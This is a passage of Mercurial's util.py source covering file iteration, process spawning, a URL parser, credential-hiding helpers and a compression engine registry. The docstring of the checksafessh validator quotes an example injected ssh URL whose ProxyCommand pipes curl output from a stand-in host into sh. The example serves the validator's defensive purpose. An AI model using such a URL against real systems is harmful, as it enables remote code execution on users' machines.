2622 2622 # os.read only raises EINTR before any data is read
2623 2623 if ex.errno == errno.EINTR:
2624 2624 continue
2625 2625 else:
2626 2626 raise
2627 2627 line += buf
2628 2628 if '\n' in buf:
2629 2629 splitted = line.splitlines(True)
2630 2630 line = ''
2631 2631 for l in splitted:
2632 2632 if l[-1] == '\n':
2633 2633 yield l
2634 2634 else:
2635 2635 line = l
2636 2636 if not buf:
2637 2637 break
2638 2638 if line:
2639 2639 yield line
2640 2640
2641 2641 def iterfile(fp):
2642 2642 fastpath = True
2643 2643 if type(fp) is file:
2644 2644 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2645 2645 if fastpath:
2646 2646 return fp
2647 2647 else:
2648 2648 return _safeiterfile(fp)
2649 2649 else:
2650 2650 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2651 2651 def iterfile(fp):
2652 2652 return fp
2653 2653
2654 2654 def iterlines(iterator):
2655 2655 for chunk in iterator:
2656 2656 for line in chunk.splitlines():
2657 2657 yield line
2658 2658
2659 2659 def expandpath(path):
2660 2660 return os.path.expanduser(os.path.expandvars(path))
2661 2661
2662 2662 def hgcmd():
2663 2663 """Return the command used to execute current hg
2664 2664
2665 2665 This is different from hgexecutable() because on Windows we want
2666 2666 to avoid things like batch files opening new shell windows, so we
2667 2667 get either the python call or the current executable.
2668 2668 """
2669 2669 if mainfrozen():
2670 2670 if getattr(sys, 'frozen', None) == 'macosx_app':
2671 2671 # Env variable set by py2app
2672 2672 return [encoding.environ['EXECUTABLEPATH']]
2673 2673 else:
2674 2674 return [pycompat.sysexecutable]
2675 2675 return gethgcmd()
2676 2676
2677 2677 def rundetached(args, condfn):
2678 2678 """Execute the argument list in a detached process.
2679 2679
2680 2680 condfn is a callable which is called repeatedly and should return
2681 2681 True once the child process is known to have started successfully.
2682 2682 At this point, the child process PID is returned. If the child
2683 2683 process fails to start or finishes before condfn() evaluates to
2684 2684 True, return -1.
2685 2685 """
2686 2686 # Windows case is easier because the child process is either
2687 2687 # successfully starting and validating the condition or exiting
2688 2688 # on failure. We just poll on its PID. On Unix, if the child
2689 2689 # process fails to start, it will be left in a zombie state until
2690 2690 # the parent waits on it, which we cannot do since we expect a
2691 2691 # long-running process on success. Instead we listen for SIGCHLD telling
2692 2692 # us our child process terminated.
2693 2693 terminated = set()
2694 2694 def handler(signum, frame):
2695 2695 terminated.add(os.wait())
2696 2696 prevhandler = None
2697 2697 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2698 2698 if SIGCHLD is not None:
2699 2699 prevhandler = signal.signal(SIGCHLD, handler)
2700 2700 try:
2701 2701 pid = spawndetached(args)
2702 2702 while not condfn():
2703 2703 if ((pid in terminated or not testpid(pid))
2704 2704 and not condfn()):
2705 2705 return -1
2706 2706 time.sleep(0.1)
2707 2707 return pid
2708 2708 finally:
2709 2709 if prevhandler is not None:
2710 2710 signal.signal(signal.SIGCHLD, prevhandler)
2711 2711
2712 2712 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2713 2713 """Return the result of interpolating items in the mapping into string s.
2714 2714
2715 2715 prefix is a single character string, or a two character string with
2716 2716 a backslash as the first character if the prefix needs to be escaped in
2717 2717 a regular expression.
2718 2718
2719 2719 fn is an optional function that will be applied to the replacement text
2720 2720 just before replacement.
2721 2721
2722 2722 escape_prefix is an optional flag that allows using doubled prefix for
2723 2723 its escaping.
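
    A small example (illustrative; note the backslash-escaped prefix):

    >>> interpolate(br'\$', {b'foo': b'bar'}, b'say $foo')
    'say bar'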
2724 2724 """
2725 2725 fn = fn or (lambda s: s)
2726 2726 patterns = '|'.join(mapping.keys())
2727 2727 if escape_prefix:
2728 2728 patterns += '|' + prefix
2729 2729 if len(prefix) > 1:
2730 2730 prefix_char = prefix[1:]
2731 2731 else:
2732 2732 prefix_char = prefix
2733 2733 mapping[prefix_char] = prefix_char
2734 2734 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2735 2735 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2736 2736
2737 2737 def getport(port):
2738 2738 """Return the port for a given network service.
2739 2739
2740 2740 If port is an integer, it's returned as is. If it's a string, it's
2741 2741 looked up using socket.getservbyname(). If there's no matching
2742 2742 service, error.Abort is raised.
2743 2743 """
2744 2744 try:
2745 2745 return int(port)
2746 2746 except ValueError:
2747 2747 pass
2748 2748
2749 2749 try:
2750 2750 return socket.getservbyname(pycompat.sysstr(port))
2751 2751 except socket.error:
2752 2752 raise Abort(_("no port number associated with service '%s'") % port)
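
# For instance (illustrative): getport(b'8080') -> 8080, while
# getport(b'http') consults getservbyname() and normally yields 80.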
2753 2753
2754 2754 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2755 2755 '0': False, 'no': False, 'false': False, 'off': False,
2756 2756 'never': False}
2757 2757
2758 2758 def parsebool(s):
2759 2759 """Parse s into a boolean.
2760 2760
2761 2761 If s is not a valid boolean, returns None.
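
    Illustrative doctests:

    >>> parsebool(b'on'), parsebool(b'0')
    (True, False)
    >>> parsebool(b'Maybe') is None
    True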
2762 2762 """
2763 2763 return _booleans.get(s.lower(), None)
2764 2764
2765 2765 _hextochr = dict((a + b, chr(int(a + b, 16)))
2766 2766 for a in string.hexdigits for b in string.hexdigits)
2767 2767
2768 2768 class url(object):
2769 2769 r"""Reliable URL parser.
2770 2770
2771 2771 This parses URLs and provides attributes for the following
2772 2772 components:
2773 2773
2774 2774 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2775 2775
2776 2776 Missing components are set to None. The only exception is
2777 2777 fragment, which is set to '' if present but empty.
2778 2778
2779 2779 If parsefragment is False, fragment is included in query. If
2780 2780 parsequery is False, query is included in path. If both are
2781 2781 False, both fragment and query are included in path.
2782 2782
2783 2783 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2784 2784
2785 2785 Note that for backward compatibility reasons, bundle URLs do not
2786 2786 take host names. That means 'bundle://../' has a path of '../'.
2787 2787
2788 2788 Examples:
2789 2789
2790 2790 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2791 2791 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2792 2792 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2793 2793 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2794 2794 >>> url(b'file:///home/joe/repo')
2795 2795 <url scheme: 'file', path: '/home/joe/repo'>
2796 2796 >>> url(b'file:///c:/temp/foo/')
2797 2797 <url scheme: 'file', path: 'c:/temp/foo/'>
2798 2798 >>> url(b'bundle:foo')
2799 2799 <url scheme: 'bundle', path: 'foo'>
2800 2800 >>> url(b'bundle://../foo')
2801 2801 <url scheme: 'bundle', path: '../foo'>
2802 2802 >>> url(br'c:\foo\bar')
2803 2803 <url path: 'c:\\foo\\bar'>
2804 2804 >>> url(br'\\blah\blah\blah')
2805 2805 <url path: '\\\\blah\\blah\\blah'>
2806 2806 >>> url(br'\\blah\blah\blah#baz')
2807 2807 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2808 2808 >>> url(br'file:///C:\users\me')
2809 2809 <url scheme: 'file', path: 'C:\\users\\me'>
2810 2810
2811 2811 Authentication credentials:
2812 2812
2813 2813 >>> url(b'ssh://joe:xyz@x/repo')
2814 2814 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2815 2815 >>> url(b'ssh://joe@x/repo')
2816 2816 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2817 2817
2818 2818 Query strings and fragments:
2819 2819
2820 2820 >>> url(b'http://host/a?b#c')
2821 2821 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2822 2822 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2823 2823 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2824 2824
2825 2825 Empty path:
2826 2826
2827 2827 >>> url(b'')
2828 2828 <url path: ''>
2829 2829 >>> url(b'#a')
2830 2830 <url path: '', fragment: 'a'>
2831 2831 >>> url(b'http://host/')
2832 2832 <url scheme: 'http', host: 'host', path: ''>
2833 2833 >>> url(b'http://host/#a')
2834 2834 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2835 2835
2836 2836 Only scheme:
2837 2837
2838 2838 >>> url(b'http:')
2839 2839 <url scheme: 'http'>
2840 2840 """
2841 2841
2842 2842 _safechars = "!~*'()+"
2843 2843 _safepchars = "/!~*'()+:\\"
2844 2844 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2845 2845
2846 2846 def __init__(self, path, parsequery=True, parsefragment=True):
2847 2847 # We slowly chomp away at path until we have only the path left
2848 2848 self.scheme = self.user = self.passwd = self.host = None
2849 2849 self.port = self.path = self.query = self.fragment = None
2850 2850 self._localpath = True
2851 2851 self._hostport = ''
2852 2852 self._origpath = path
2853 2853
2854 2854 if parsefragment and '#' in path:
2855 2855 path, self.fragment = path.split('#', 1)
2856 2856
2857 2857 # special case for Windows drive letters and UNC paths
2858 2858 if hasdriveletter(path) or path.startswith('\\\\'):
2859 2859 self.path = path
2860 2860 return
2861 2861
2862 2862 # For compatibility reasons, we can't handle bundle paths as
2863 2863 # normal URLs
2864 2864 if path.startswith('bundle:'):
2865 2865 self.scheme = 'bundle'
2866 2866 path = path[7:]
2867 2867 if path.startswith('//'):
2868 2868 path = path[2:]
2869 2869 self.path = path
2870 2870 return
2871 2871
2872 2872 if self._matchscheme(path):
2873 2873 parts = path.split(':', 1)
2874 2874 if parts[0]:
2875 2875 self.scheme, path = parts
2876 2876 self._localpath = False
2877 2877
2878 2878 if not path:
2879 2879 path = None
2880 2880 if self._localpath:
2881 2881 self.path = ''
2882 2882 return
2883 2883 else:
2884 2884 if self._localpath:
2885 2885 self.path = path
2886 2886 return
2887 2887
2888 2888 if parsequery and '?' in path:
2889 2889 path, self.query = path.split('?', 1)
2890 2890 if not path:
2891 2891 path = None
2892 2892 if not self.query:
2893 2893 self.query = None
2894 2894
2895 2895 # // is required to specify a host/authority
2896 2896 if path and path.startswith('//'):
2897 2897 parts = path[2:].split('/', 1)
2898 2898 if len(parts) > 1:
2899 2899 self.host, path = parts
2900 2900 else:
2901 2901 self.host = parts[0]
2902 2902 path = None
2903 2903 if not self.host:
2904 2904 self.host = None
2905 2905 # path of file:///d is /d
2906 2906 # path of file:///d:/ is d:/, not /d:/
2907 2907 if path and not hasdriveletter(path):
2908 2908 path = '/' + path
2909 2909
2910 2910 if self.host and '@' in self.host:
2911 2911 self.user, self.host = self.host.rsplit('@', 1)
2912 2912 if ':' in self.user:
2913 2913 self.user, self.passwd = self.user.split(':', 1)
2914 2914 if not self.host:
2915 2915 self.host = None
2916 2916
2917 2917 # Don't split on colons in IPv6 addresses without ports
2918 2918 if (self.host and ':' in self.host and
2919 2919 not (self.host.startswith('[') and self.host.endswith(']'))):
2920 2920 self._hostport = self.host
2921 2921 self.host, self.port = self.host.rsplit(':', 1)
2922 2922 if not self.host:
2923 2923 self.host = None
2924 2924
2925 2925 if (self.host and self.scheme == 'file' and
2926 2926 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2927 2927 raise Abort(_('file:// URLs can only refer to localhost'))
2928 2928
2929 2929 self.path = path
2930 2930
2931 2931 # leave the query string escaped
2932 2932 for a in ('user', 'passwd', 'host', 'port',
2933 2933 'path', 'fragment'):
2934 2934 v = getattr(self, a)
2935 2935 if v is not None:
2936 2936 setattr(self, a, urlreq.unquote(v))
2937 2937
2938 2938 @encoding.strmethod
2939 2939 def __repr__(self):
2940 2940 attrs = []
2941 2941 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2942 2942 'query', 'fragment'):
2943 2943 v = getattr(self, a)
2944 2944 if v is not None:
2945 2945 attrs.append('%s: %r' % (a, v))
2946 2946 return '<url %s>' % ', '.join(attrs)
2947 2947
2948 2948 def __bytes__(self):
2949 2949 r"""Join the URL's components back into a URL string.
2950 2950
2951 2951 Examples:
2952 2952
2953 2953 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2954 2954 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2955 2955 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2956 2956 'http://user:pw@host:80/?foo=bar&baz=42'
2957 2957 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2958 2958 'http://user:pw@host:80/?foo=bar%3dbaz'
2959 2959 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2960 2960 'ssh://user:pw@[::1]:2200//home/joe#'
2961 2961 >>> bytes(url(b'http://localhost:80//'))
2962 2962 'http://localhost:80//'
2963 2963 >>> bytes(url(b'http://localhost:80/'))
2964 2964 'http://localhost:80/'
2965 2965 >>> bytes(url(b'http://localhost:80'))
2966 2966 'http://localhost:80/'
2967 2967 >>> bytes(url(b'bundle:foo'))
2968 2968 'bundle:foo'
2969 2969 >>> bytes(url(b'bundle://../foo'))
2970 2970 'bundle:../foo'
2971 2971 >>> bytes(url(b'path'))
2972 2972 'path'
2973 2973 >>> bytes(url(b'file:///tmp/foo/bar'))
2974 2974 'file:///tmp/foo/bar'
2975 2975 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2976 2976 'file:///c:/tmp/foo/bar'
2977 2977 >>> print(url(br'bundle:foo\bar'))
2978 2978 bundle:foo\bar
2979 2979 >>> print(url(br'file:///D:\data\hg'))
2980 2980 file:///D:\data\hg
2981 2981 """
2982 2982 if self._localpath:
2983 2983 s = self.path
2984 2984 if self.scheme == 'bundle':
2985 2985 s = 'bundle:' + s
2986 2986 if self.fragment:
2987 2987 s += '#' + self.fragment
2988 2988 return s
2989 2989
2990 2990 s = self.scheme + ':'
2991 2991 if self.user or self.passwd or self.host:
2992 2992 s += '//'
2993 2993 elif self.scheme and (not self.path or self.path.startswith('/')
2994 2994 or hasdriveletter(self.path)):
2995 2995 s += '//'
2996 2996 if hasdriveletter(self.path):
2997 2997 s += '/'
2998 2998 if self.user:
2999 2999 s += urlreq.quote(self.user, safe=self._safechars)
3000 3000 if self.passwd:
3001 3001 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3002 3002 if self.user or self.passwd:
3003 3003 s += '@'
3004 3004 if self.host:
3005 3005 if not (self.host.startswith('[') and self.host.endswith(']')):
3006 3006 s += urlreq.quote(self.host)
3007 3007 else:
3008 3008 s += self.host
3009 3009 if self.port:
3010 3010 s += ':' + urlreq.quote(self.port)
3011 3011 if self.host:
3012 3012 s += '/'
3013 3013 if self.path:
3014 3014 # TODO: similar to the query string, we should not unescape the
3015 3015 # path when we store it, the path might contain '%2f' = '/',
3016 3016 # which we should *not* escape.
3017 3017 s += urlreq.quote(self.path, safe=self._safepchars)
3018 3018 if self.query:
3019 3019 # we store the query in escaped form.
3020 3020 s += '?' + self.query
3021 3021 if self.fragment is not None:
3022 3022 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3023 3023 return s
3024 3024
3025 3025 __str__ = encoding.strmethod(__bytes__)
3026 3026
3027 3027 def authinfo(self):
3028 3028 user, passwd = self.user, self.passwd
3029 3029 try:
3030 3030 self.user, self.passwd = None, None
3031 3031 s = bytes(self)
3032 3032 finally:
3033 3033 self.user, self.passwd = user, passwd
3034 3034 if not self.user:
3035 3035 return (s, None)
3036 3036 # authinfo[1] is passed to urllib2 password manager, and its
3037 3037 # URIs must not contain credentials. The host is passed in the
3038 3038 # URIs list because Python < 2.4.3 uses only that to search for
3039 3039 # a password.
3040 3040 return (s, (None, (s, self.host),
3041 3041 self.user, self.passwd or ''))
3042 3042
3043 3043 def isabs(self):
3044 3044 if self.scheme and self.scheme != 'file':
3045 3045 return True # remote URL
3046 3046 if hasdriveletter(self.path):
3047 3047 return True # absolute for our purposes - can't be joined()
3048 3048 if self.path.startswith(br'\\'):
3049 3049 return True # Windows UNC path
3050 3050 if self.path.startswith('/'):
3051 3051 return True # POSIX-style
3052 3052 return False
3053 3053
3054 3054 def localpath(self):
3055 3055 if self.scheme == 'file' or self.scheme == 'bundle':
3056 3056 path = self.path or '/'
3057 3057 # For Windows, we need to promote hosts containing drive
3058 3058 # letters to paths with drive letters.
3059 3059 if hasdriveletter(self._hostport):
3060 3060 path = self._hostport + '/' + self.path
3061 3061 elif (self.host is not None and self.path
3062 3062 and not hasdriveletter(path)):
3063 3063 path = '/' + path
3064 3064 return path
3065 3065 return self._origpath
3066 3066
3067 3067 def islocal(self):
3068 3068 '''whether localpath will return something that posixfile can open'''
3069 3069 return (not self.scheme or self.scheme == 'file'
3070 3070 or self.scheme == 'bundle')
3071 3071
3072 3072 def hasscheme(path):
3073 3073 return bool(url(path).scheme)
3074 3074
3075 3075 def hasdriveletter(path):
3076 3076 return path and path[1:2] == ':' and path[0:1].isalpha()
3077 3077
3078 3078 def urllocalpath(path):
3079 3079 return url(path, parsequery=False, parsefragment=False).localpath()
3080 3080
3081 3081 def checksafessh(path):
3082 3082 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3083 3083
3084 3084 This is a sanity check for ssh urls. ssh will parse the first item as
3085 3085 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3086 3086 Let's prevent these potentially exploited urls entirely and warn the
3087 3087 user.
3088 3088
3089 3089 Raises an error.Abort when the url is unsafe.
3090 3090 """
3091 3091 path = urlreq.unquote(path)
3092 3092 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3093 3093 raise error.Abort(_('potentially unsafe url: %r') %
3094 3094 (path,))
3095 3095
3096 3096 def hidepassword(u):
3097 3097 '''hide user credentials in a url string
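
    An example (illustrative):

    >>> hidepassword(b'http://user:secret@example.com/repo')
    'http://user:***@example.com/repo'
    '''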
3098 3098 u = url(u)
3099 3099 if u.passwd:
3100 3100 u.passwd = '***'
3101 3101 return bytes(u)
3102 3102
3103 3103 def removeauth(u):
3104 3104 '''remove all authentication information from a url string'''
3105 3105 u = url(u)
3106 3106 u.user = u.passwd = None
3107 3107 return bytes(u)
3108 3108
3109 3109 timecount = unitcountfn(
3110 3110 (1000, 1, _('%.0f s')),
3111 3111 (100, 1, _('%.1f s')),
3112 3112 (10, 1, _('%.2f s')),
3113 3113 (1, 1, _('%.3f s')),
3114 3114 (100, 0.001, _('%.1f ms')),
3115 3115 (10, 0.001, _('%.2f ms')),
3116 3116 (1, 0.001, _('%.3f ms')),
3117 3117 (100, 0.000001, _('%.1f us')),
3118 3118 (10, 0.000001, _('%.2f us')),
3119 3119 (1, 0.000001, _('%.3f us')),
3120 3120 (100, 0.000000001, _('%.1f ns')),
3121 3121 (10, 0.000000001, _('%.2f ns')),
3122 3122 (1, 0.000000001, _('%.3f ns')),
3123 3123 )
3124 3124
3125 3125 _timenesting = [0]
3126 3126
3127 3127 def timed(func):
3128 3128 '''Report the execution time of a function call to stderr.
3129 3129
3130 3130 During development, use as a decorator when you need to measure
3131 3131 the cost of a function, e.g. as follows:
3132 3132
3133 3133 @util.timed
3134 3134 def foo(a, b, c):
3135 3135 pass
3136 3136 '''
3137 3137
3138 3138 def wrapper(*args, **kwargs):
3139 3139 start = timer()
3140 3140 indent = 2
3141 3141 _timenesting[0] += indent
3142 3142 try:
3143 3143 return func(*args, **kwargs)
3144 3144 finally:
3145 3145 elapsed = timer() - start
3146 3146 _timenesting[0] -= indent
3147 3147 stderr.write('%s%s: %s\n' %
3148 3148 (' ' * _timenesting[0], func.__name__,
3149 3149 timecount(elapsed)))
3150 3150 return wrapper
3151 3151
3152 3152 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3153 3153 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3154 3154
3155 3155 def sizetoint(s):
3156 3156 '''Convert a size specifier to a byte count.
3157 3157
3158 3158 >>> sizetoint(b'30')
3159 3159 30
3160 3160 >>> sizetoint(b'2.2kb')
3161 3161 2252
3162 3162 >>> sizetoint(b'6M')
3163 3163 6291456
3164 3164 '''
3165 3165 t = s.strip().lower()
3166 3166 try:
3167 3167 for k, u in _sizeunits:
3168 3168 if t.endswith(k):
3169 3169 return int(float(t[:-len(k)]) * u)
3170 3170 return int(t)
3171 3171 except ValueError:
3172 3172 raise error.ParseError(_("couldn't parse size: %s") % s)
3173 3173
3174 3174 class hooks(object):
3175 3175 '''A collection of hook functions that can be used to extend a
3176 3176 function's behavior. Hooks are called in lexicographic order,
3177 3177 based on the names of their sources.
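
    A small illustrative doctest:

    >>> h = hooks()
    >>> h.add(b'b', lambda x: x + 1)
    >>> h.add(b'a', lambda x: x * 2)
    >>> h(3)
    [6, 4]
    '''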
3178 3178
3179 3179 def __init__(self):
3180 3180 self._hooks = []
3181 3181
3182 3182 def add(self, source, hook):
3183 3183 self._hooks.append((source, hook))
3184 3184
3185 3185 def __call__(self, *args):
3186 3186 self._hooks.sort(key=lambda x: x[0])
3187 3187 results = []
3188 3188 for source, hook in self._hooks:
3189 3189 results.append(hook(*args))
3190 3190 return results
3191 3191
3192 3192 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3193 3193 '''Yields lines for a nicely formatted stacktrace.
3194 3194 Skips the 'skip' last entries, then returns the last 'depth' entries.
3195 3195 Each file+linenumber is formatted according to fileline.
3196 3196 Each line is formatted according to line.
3197 3197 If line is None, it yields:
3198 3198 length of longest filepath+line number,
3199 3199 filepath+linenumber,
3200 3200 function
3201 3201
3202 3202 Not to be used in production code, but very convenient while developing.
3203 3203 '''
3204 3204 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3205 3205 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3206 3206 ][-depth:]
3207 3207 if entries:
3208 3208 fnmax = max(len(entry[0]) for entry in entries)
3209 3209 for fnln, func in entries:
3210 3210 if line is None:
3211 3211 yield (fnmax, fnln, func)
3212 3212 else:
3213 3213 yield line % (fnmax, fnln, func)
3214 3214
3215 3215 def debugstacktrace(msg='stacktrace', skip=0,
3216 3216 f=stderr, otherf=stdout, depth=0):
3217 3217 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3218 3218 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3219 3219 By default it will flush stdout first.
3220 3220 It can be used everywhere and intentionally does not require a ui object.
3221 3221 Not to be used in production code, but very convenient while developing.
3222 3222 '''
3223 3223 if otherf:
3224 3224 otherf.flush()
3225 3225 f.write('%s at:\n' % msg.rstrip())
3226 3226 for line in getstackframes(skip + 1, depth=depth):
3227 3227 f.write(line)
3228 3228 f.flush()
3229 3229
3230 3230 class dirs(object):
3231 3231 '''a multiset of directory names from a dirstate or manifest'''
3232 3232
3233 3233 def __init__(self, map, skip=None):
3234 3234 self._dirs = {}
3235 3235 addpath = self.addpath
3236 3236 if safehasattr(map, 'iteritems') and skip is not None:
3237 3237 for f, s in map.iteritems():
3238 3238 if s[0] != skip:
3239 3239 addpath(f)
3240 3240 else:
3241 3241 for f in map:
3242 3242 addpath(f)
3243 3243
3244 3244 def addpath(self, path):
3245 3245 dirs = self._dirs
3246 3246 for base in finddirs(path):
3247 3247 if base in dirs:
3248 3248 dirs[base] += 1
3249 3249 return
3250 3250 dirs[base] = 1
3251 3251
3252 3252 def delpath(self, path):
3253 3253 dirs = self._dirs
3254 3254 for base in finddirs(path):
3255 3255 if dirs[base] > 1:
3256 3256 dirs[base] -= 1
3257 3257 return
3258 3258 del dirs[base]
3259 3259
3260 3260 def __iter__(self):
3261 3261 return iter(self._dirs)
3262 3262
3263 3263 def __contains__(self, d):
3264 3264 return d in self._dirs
3265 3265
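# Illustrative sketch (not part of the original module): the multiset
# semantics mean a directory stays present until its last file is gone.
#
#   d = dirs(['a/b/f1', 'a/b/f2'])
#   'a/b' in d          # True
#   d.delpath('a/b/f1')
#   'a/b' in d          # still True; 'a/b/f2' remains
#   d.delpath('a/b/f2')
#   'a/b' in d          # now False
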
3266 3266 if safehasattr(parsers, 'dirs'):
3267 3267 dirs = parsers.dirs
3268 3268
3269 3269 def finddirs(path):
3270 3270 pos = path.rfind('/')
3271 3271 while pos != -1:
3272 3272 yield path[:pos]
3273 3273 pos = path.rfind('/', 0, pos)
3274 3274
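# Illustrative sketch (not part of the original module): finddirs yields
# ancestor directories from the innermost outward.
#
#   list(finddirs('a/b/c'))   # -> ['a/b', 'a']
#   list(finddirs('top'))     # -> [] (no '/' in the path)
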
3275 3275 # compression code
3276 3276
3277 3277 SERVERROLE = 'server'
3278 3278 CLIENTROLE = 'client'
3279 3279
3280 3280 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3281 3281 (u'name', u'serverpriority',
3282 3282 u'clientpriority'))
3283 3283
3284 3284 class compressormanager(object):
3285 3285 """Holds registrations of various compression engines.
3286 3286
3287 3287 This class essentially abstracts the differences between compression
3288 3288 engines to allow new compression formats to be added easily, possibly from
3289 3289 extensions.
3290 3290
3291 3291 Compressors are registered against the global instance by calling its
3292 3292 ``register()`` method.
3293 3293 """
3294 3294 def __init__(self):
3295 3295 self._engines = {}
3296 3296 # Bundle spec human name to engine name.
3297 3297 self._bundlenames = {}
3298 3298 # Internal bundle identifier to engine name.
3299 3299 self._bundletypes = {}
3300 3300 # Revlog header to engine name.
3301 3301 self._revlogheaders = {}
3302 3302 # Wire proto identifier to engine name.
3303 3303 self._wiretypes = {}
3304 3304
3305 3305 def __getitem__(self, key):
3306 3306 return self._engines[key]
3307 3307
3308 3308 def __contains__(self, key):
3309 3309 return key in self._engines
3310 3310
3311 3311 def __iter__(self):
3312 3312 return iter(self._engines.keys())
3313 3313
3314 3314 def register(self, engine):
3315 3315 """Register a compression engine with the manager.
3316 3316
3317 3317 The argument must be a ``compressionengine`` instance.
3318 3318 """
3319 3319 if not isinstance(engine, compressionengine):
3320 3320 raise ValueError(_('argument must be a compressionengine'))
3321 3321
3322 3322 name = engine.name()
3323 3323
3324 3324 if name in self._engines:
3325 3325 raise error.Abort(_('compression engine %s already registered') %
3326 3326 name)
3327 3327
3328 3328 bundleinfo = engine.bundletype()
3329 3329 if bundleinfo:
3330 3330 bundlename, bundletype = bundleinfo
3331 3331
3332 3332 if bundlename in self._bundlenames:
3333 3333 raise error.Abort(_('bundle name %s already registered') %
3334 3334 bundlename)
3335 3335 if bundletype in self._bundletypes:
3336 3336 raise error.Abort(_('bundle type %s already registered by %s') %
3337 3337 (bundletype, self._bundletypes[bundletype]))
3338 3338
3339 3339             # bundlename may be empty if the engine declares no external-facing name.
3340 3340 if bundlename:
3341 3341 self._bundlenames[bundlename] = name
3342 3342
3343 3343 self._bundletypes[bundletype] = name
3344 3344
3345 3345 wiresupport = engine.wireprotosupport()
3346 3346 if wiresupport:
3347 3347 wiretype = wiresupport.name
3348 3348 if wiretype in self._wiretypes:
3349 3349 raise error.Abort(_('wire protocol compression %s already '
3350 3350 'registered by %s') %
3351 3351 (wiretype, self._wiretypes[wiretype]))
3352 3352
3353 3353 self._wiretypes[wiretype] = name
3354 3354
3355 3355 revlogheader = engine.revlogheader()
3356 3356 if revlogheader and revlogheader in self._revlogheaders:
3357 3357 raise error.Abort(_('revlog header %s already registered by %s') %
3358 3358 (revlogheader, self._revlogheaders[revlogheader]))
3359 3359
3360 3360 if revlogheader:
3361 3361 self._revlogheaders[revlogheader] = name
3362 3362
3363 3363 self._engines[name] = engine
3364 3364
3365 3365 @property
3366 3366 def supportedbundlenames(self):
3367 3367 return set(self._bundlenames.keys())
3368 3368
3369 3369 @property
3370 3370 def supportedbundletypes(self):
3371 3371 return set(self._bundletypes.keys())
3372 3372
3373 3373 def forbundlename(self, bundlename):
3374 3374 """Obtain a compression engine registered to a bundle name.
3375 3375
3376 3376         Will raise KeyError if the bundle name isn't registered.
3377 3377
3378 3378 Will abort if the engine is known but not available.
3379 3379 """
3380 3380 engine = self._engines[self._bundlenames[bundlename]]
3381 3381 if not engine.available():
3382 3382 raise error.Abort(_('compression engine %s could not be loaded') %
3383 3383 engine.name())
3384 3384 return engine
3385 3385
3386 3386 def forbundletype(self, bundletype):
3387 3387 """Obtain a compression engine registered to a bundle type.
3388 3388
3389 3389 Will raise KeyError if the bundle type isn't registered.
3390 3390
3391 3391 Will abort if the engine is known but not available.
3392 3392 """
3393 3393 engine = self._engines[self._bundletypes[bundletype]]
3394 3394 if not engine.available():
3395 3395 raise error.Abort(_('compression engine %s could not be loaded') %
3396 3396 engine.name())
3397 3397 return engine
3398 3398
3399 3399 def supportedwireengines(self, role, onlyavailable=True):
3400 3400 """Obtain compression engines that support the wire protocol.
3401 3401
3402 3402 Returns a list of engines in prioritized order, most desired first.
3403 3403
3404 3404 If ``onlyavailable`` is set, filter out engines that can't be
3405 3405 loaded.
3406 3406 """
3407 3407 assert role in (SERVERROLE, CLIENTROLE)
3408 3408
3409 3409 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3410 3410
3411 3411 engines = [self._engines[e] for e in self._wiretypes.values()]
3412 3412 if onlyavailable:
3413 3413 engines = [e for e in engines if e.available()]
3414 3414
3415 3415 def getkey(e):
3416 3416 # Sort first by priority, highest first. In case of tie, sort
3417 3417 # alphabetically. This is arbitrary, but ensures output is
3418 3418 # stable.
3419 3419 w = e.wireprotosupport()
3420 3420 return -1 * getattr(w, attr), w.name
3421 3421
3422 3422         return sorted(engines, key=getkey)
3423 3423
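    # Illustrative sketch (not part of the original module): this returns
    # engines most-preferred first; callers are expected to skip entries
    # whose priority for the role is non-positive when advertising. With
    # the default priorities declared by the engines below:
    #
    #   [e.name() for e in compengines.supportedwireengines(SERVERROLE)]
    #   # -> ['zstd', 'zlib', 'bzip2', 'none'] when the zstd module is present
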
3424 3424 def forwiretype(self, wiretype):
3425 3425 engine = self._engines[self._wiretypes[wiretype]]
